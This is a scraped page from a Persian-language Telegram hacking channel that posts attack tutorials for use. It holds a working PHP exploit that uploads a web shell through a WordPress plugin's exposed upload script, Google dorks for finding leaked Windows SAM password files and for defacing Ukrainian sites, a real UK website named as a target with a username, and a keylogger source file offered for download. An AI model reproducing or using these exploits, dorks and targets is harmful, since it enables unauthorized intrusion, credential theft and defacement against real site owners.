0Day.Today | Learn Exploit | Zero World | Dark web |
19.1K subscribers
1.23K photos
127 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
اموزش #نصب #sqplmap روی kali windows app
install #sqlmap on the #kali (kali) #win_10 (#windows_10) #app store !
@LeranExploit
کیلاگر ضبط کننده ی کلید ها!
دوستان این کد priv8 بوده و از darkweb برداشته شده .
❤‍🔥1
trojan.cpp
2.2 KB
کیلاگر ضبط کننده ی کلید ها!
اموزش نوشتن #کرکر وردپرس
#WP #Cracker by #Evil_Boy
@LearnExploit
0Day.Today (Tele)
http://izkalite.gov.tr/portal/hata.php?mesaj=


میبیند که میتونید تگ های Html خودتون رو جلوی = بذارید و صفحه تغییر پیدا کنه
هکر ها یا کلاه برداران اینترنتی از این ها جهت فریب تارگت هاشون استفاده
اموزش بدست اوردن
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
-----
@LearnExploit
اموزش بدست اوردن
userName & password
سیستم ویندوز از طریق سایت 😄
------
#Find #SAM file with a #Dork (#GHDB) #OS_Windows
------
شاید اول از هر چیزی بپرسید که SAM چیه ؟
دوستان SAM با همون
Security Account Manager
است که user and pass ویندوز رو درون خودش نگهداری میکنه !
فایل SAM ساختار ساده ای داره و از دو نوع الگوریتم Hashing به نام های LM (یه یک الگریتم ضعیف بوده) و NTLM (که یک الگریتم جدید و بهبود یافته است) .
شما میتونید فایل SAM ویندوز خودتون رو از مسیر زیر بدست بیارید :
%SystemRoot%/system32/config/SAM
(در مورد Dump این فاید بعدا صحبت میکنیم).
_
حالا روش بدست اوردن این فایل از طریق وب :
Dork : filetype:txt Administrator:500:
و تمام :)
نمونه :
https://www.albany.edu/~goel/classes/spring2010/itm604/pwfile.txt
=====================
#X0P4SH4
T.me/LearnExploit
0Day.Today
نحوه ی هک (دیفیس) سایت توسط باگ Url Posting
#Url_Posting #Bug #Deface
-------------------------------
همان طور که از اسم سایت پیداست شما میتونید با استفاده از این باگ و به وسیله ی URL در سایت تغییراتی ایجاد کنید.
دورک مورد استفاده دراین باگ :

<Start ~ Dorks >

| site:ua "j images jdownloads screenshots version php j"
| site:ua "wp content uploads gravity forms index php option com jdownloads"
| site:ua "plugins editors jce tiny mce plugins cfg contactform"
| site:ua "cfg contactform"

<end ~ Dorks>
~~~~~~~~~~~~~~
POC ~ Exploiting :
just change Url of site ::::

http[s]://Example.me/HACKED-BY-X0P4SH4
:)
#X0P4SH4
t.me/LearnExploit
0Day.Today
#TarGet
~ :
http://www.janinedrayson.co.uk/

#User
~ :
Janinedr

#Pass
~:
Find By self :)

#Bug
~:
Sql
~~~~~~~~~~~~
Have Nice day !
I'm X0P4SH4

there [0Day.Today] Of telegram
ID : @LearnExploit
#WP(Wordpress) #Hacking #Plugin (Peugeot-Music-Plugin) #Exploit
-------------~______~---------

#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"

#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"

#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here

$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.

#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php

========================
#GOODNIGHT
#X0P4SH4

T.me/LearnExploit
0Day.Today
👍1
اموزش نحوه ی #اکسپلویت #روتر های TeDate-ZTE
How to #Exploit #TeDate_ZTE #Rauter's
---> ~# @LearnExploit
---------